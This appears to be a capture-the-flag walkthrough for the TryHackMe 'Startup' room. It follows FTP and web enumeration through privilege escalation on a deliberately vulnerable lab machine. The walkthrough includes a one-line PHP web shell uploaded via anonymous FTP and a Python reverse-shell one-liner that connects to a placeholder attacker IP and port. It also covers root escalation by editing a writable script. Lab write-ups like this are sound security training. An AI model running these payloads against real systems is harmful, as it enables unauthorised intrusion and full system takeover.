Link: https://tryhackme.com/room/startup
Enumeration
Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
FTP
With anonymous user, i get the files from the server
I tested uploading a file to the ftp in the /ftp directory and it worked!
Port 80
Looking at the website we see no spice!
Some quick enum show /files path accessible with simular contents to the FTP directory
Rce
Let’s test RCE next with a simple shell.
Upload a php shell to the ftp server.
echo "<?php system($_GET['cmd']); ?>" > file.phpftp IP
cd ftp
put file.php
exit
Now visit the files directory and check for the file!
Nice, lets test rce next.
Nice, it's working, lets upgrade to a better shell.
Replace IP and PORT with your own.
http://10.10.193.7/files/ftp/file.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
We’re on!, its time to enumerate a bit…
Going to the root / directory we find some interesting files…
$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Then we find a folder calling incidents with a suspicious.pcspng
file.
I copy this over to my machine for further analysis.
# On the attacking machine in the incidents folder.
python3 -m http.server 8899# On your machine
wget IP/suspicious.pcapng
Then open the file in Wireshark
wireshark suspicious.pcapng
Right-click on some data and select the follow > tcp stream
Then start to cycle through the stream data via the up and down arrows.
A few streams in we can see someone getting a reverse shell too and some more juicy info.
Using this new info we can login to the main account ‘lennie’ now.
User
Now we can login as lennie and get the user flag
Root
Looking at the files in lennies folder reveals some interesting things like a script and a startup list.
And in lennies Documents folder, we can see a few more files of interest.
Looks like a few hints on with to put into the list file maybe? Let’s try a few things.
From the planner.sh we can see a call to another file
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
rwx? that’s weird, the w means we should have write access.
nano /etc/print.sh
Sure enough, we do!, time to get root!
Now run ./planner.sh and get a root shell :)